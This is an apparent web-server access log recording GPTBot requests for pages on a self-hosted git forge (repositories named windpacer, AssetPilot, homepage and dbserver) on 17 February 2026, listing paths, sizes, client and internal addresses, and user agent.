"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:14:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11959] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:14:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:14:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14876] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14846] [Gzip 8.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10172] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 2813995] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:14:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" -[17/Feb/2026:14:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" -[17/Feb/2026:14:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153781] [Gzip 31.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14876] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14879] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" -[17/Feb/2026:14:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:14:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:14:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 54909] [Gzip 13.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10518] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:14:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" [Client 74.7.227.38] [Length 10719] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:14:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject" [Client 74.7.227.38] [Length 10694] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" -[17/Feb/2026:14:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" [Client 74.7.227.38] [Length 10720] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:14:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11235] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:14:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11232] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv" -[17/Feb/2026:14:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11665] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:14:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 16183] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:14:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 51951] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:14:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 212441] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:14:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 440335] [Gzip 20.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:14:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" -[17/Feb/2026:14:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" -[17/Feb/2026:14:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" -[17/Feb/2026:14:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" -[17/Feb/2026:14:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11408] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" -[17/Feb/2026:14:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] 